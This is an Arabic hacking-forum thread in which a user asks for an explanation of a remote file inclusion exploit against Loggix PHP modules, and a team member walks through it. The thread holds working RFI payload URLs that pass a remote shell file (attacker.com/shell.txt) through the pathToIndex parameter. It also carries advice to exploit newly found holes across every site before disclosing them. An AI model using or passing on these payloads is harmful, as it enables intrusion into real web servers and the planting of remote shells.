التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة طلب : توضيح الاستغلال
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-02-2009, 01:06 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Death-Ghost
 

 
 
إحصائية العضو






Death-Ghost غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Death-Ghost is on a distinguished road
.... غير مجاب: طلب : توضيح الاستغلال

السلام عليكم ورحمه الله

انا عندي طلب بسيط

انا حصلت ثغره ريموت فايل انكود

وجبت الاستغلال تبعها بس المشكله اني ما فهمت الاستغلال :cry[1]:

هاد هوو الاستغلال

http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex

http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex

http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex


http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex

http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToInde


طبعا هاد كم استغلال لها

ياريت الي عنده خبره يوضح ليي الستغلال



Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC 'gf : j,qdp hghsjyghg

   

رد مع اقتباس
قديم 12-02-2009, 01:10 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 
 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road
افتراضي

ضع رابط ثغرة

التوقيع

 

   

رد مع اقتباس
قديم 12-02-2009, 01:30 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية killer-32
 

 
 
إحصائية العضو






killer-32 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
killer-32 is on a distinguished road
افتراضي

أظن أنه

[path]

هو رابط الشل

يعني جرب بدله برابط الشل

   

رد مع اقتباس
قديم 12-02-2009, 01:44 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 
 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة killer-32
أظن أنه

[path]

هو رابط الشل

يعني جرب بدله برابط الشل



[path]

هذا يا غالي مجلد اللي ركب في سكربت متلا عناكب مسميه مجلد vb
التوقيع

 

   

رد مع اقتباس
قديم 12-02-2009, 02:37 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Death-Ghost
 

 
 
إحصائية العضو






Death-Ghost غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Death-Ghost is on a distinguished road
افتراضي

http://www.milw0rm.com/exploits/9729

ها هو رابط الثغره

   

رد مع اقتباس
قديم 12-02-2009, 02:52 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

رح اشرح رابط واحد والباقي نفس الاشي والاصل تضع لنا رابط الثغره لحتى نقدر نوصل لك الفكره


http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToInde


الموقع الهدف =http://target.com/

المجلد الذي عليه السكربت =path

مثلا سكربت المنتدى مركب داخل مجلد اسمه vb
اذن
path = vb



جزء من الاستغلال
modules/downloads/lib/LM_Downloads.php?pathToInde


واما الباقي فهو الناقص وبما انك تقول انها فايل اكلود فلازم يكوون الباقي

?shell.txt=

طبعا بدك رابط شل بامتداد تكست

مممممممممممم بدون رابط الثغره شرحنا مش وافي

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-02-2009, 02:52 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

اوك هيني هسا شفت الرابط ثواني

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-02-2009, 03:01 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

اقتباس
#Dork : No DoRk f0R ScRipT KiDDieS

يعني كلمه البحث في جوجل هي
لايوجد كلمه للبحث ............(اخترعها انت من الرابط )


اقتباس
#file :
# Calendar.php
# Comment.php
# Rss.php
# Trackback.php
# LM_Downloads.php

هذه اسماء الملفات المصابه بالانكلوود


اقتباس
#3xplo!t :
#http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt???
################################################## ######################


يعني الاستغلال
ممممم خلينا نشرح استغلال واحد



اقتباس
#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???

#http://target.com/ اسم الموقع الهدف (يلي عليه السكربت)
[path]/ ........... يعني اسم المجلد يلي عليه السكربت (اذا كان السكربت داخل مجلد)



اقتباس
]/lib/Loggix/Module/Rss.php?pathToIndex=

مسار الملف المصاب على السكربت

اقتباس
http://attacker.com/shell.txt???

رابط شل بامتداد txt

ما اعتقد صعب الانكلود بسيط جدا



---------------------------------------
نصيحه من ذهب


اتركك اخي من مواقع السكيورتي هذه لانو ما بفيها ثغرات الايكون يلي اكشف الثغره زهق منها


يعني مثلا انا بكتشف ثغره بخترق فيها كل السكربتات يلي ع النت وبعدها برميها لمواقع السكيورتي

وبتلقى صار المعظم عامل ترقيع للثغره

ادخل دورات المنتدى فهي دورات حقيقه للثغرات

وفيك تستفيد اكثر بمليون مره وتوصل لمستوى رائع

بالتوفيق
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-02-2009, 03:27 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Death-Ghost
 

 
 
إحصائية العضو






Death-Ghost غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Death-Ghost is on a distinguished road
افتراضي

مشكور خيو على الشرح والنصيحه

لان فعلنا اغلب الثغرات مرقعه يعني نادر ما تحصل وحده ^_^

   

رد مع اقتباس
قديم 12-02-2009, 03:27 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية Death-Ghost
 

 
 
إحصائية العضو






Death-Ghost غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Death-Ghost is on a distinguished road
افتراضي

مشكور خيو على الشرح والنصيحه

لان فعلنا اغلب الثغرات مرقعه يعني نادر ما تحصل وحده ^_^

   

رد مع اقتباس
قديم 02-09-2010, 02:25 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية a7b
 

 
 
إحصائية العضو





a7b غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
a7b is on a distinguished road
افتراضي


نصيحه من ذهب


اتركك اخي من مواقع السكيورتي هذه لانو ما بفيها ثغرات الايكون يلي اكشف الثغره زهق منها


يعني مثلا انا بكتشف ثغره بخترق فيها كل السكربتات يلي ع النت وبعدها برميها لمواقع السكيورتي

وبتلقى صار المعظم عامل ترقيع للثغره

ادخل دورات المنتدى فهي دورات حقيقه للثغرات

وفيك تستفيد اكثر بمليون مره وتوصل لمستوى رائع

بالتوفيق [/QUOTE]


نصيحتك عععسل يااااااااعسل انت :a14:

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح و توضيح جميع طرق اختراق البريد !! Italiano Algerino Hacker قـسـم الـبـريد الإلـكتروني والحسابات العامة 17 08-23-2013 02:40 AM
ممكن توضيح dana جـــ'ابات العناكــ'ب 3 12-31-2009 06:39 PM
ممكن توضيح؟ سووويلم جـــ'ابات العناكــ'ب 2 12-03-2009 12:51 AM
سكربت مكتبة البرامج هل من توضيح xman2 قســم تطويــر المــــواقع 0 07-19-2009 08:45 PM
[ خبـر ] : توضيح إلي مشرفي قسم استايلات support قسم ستآيلات الـ vB 0 05-26-2009 12:21 AM


الساعة الآن 02:46 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0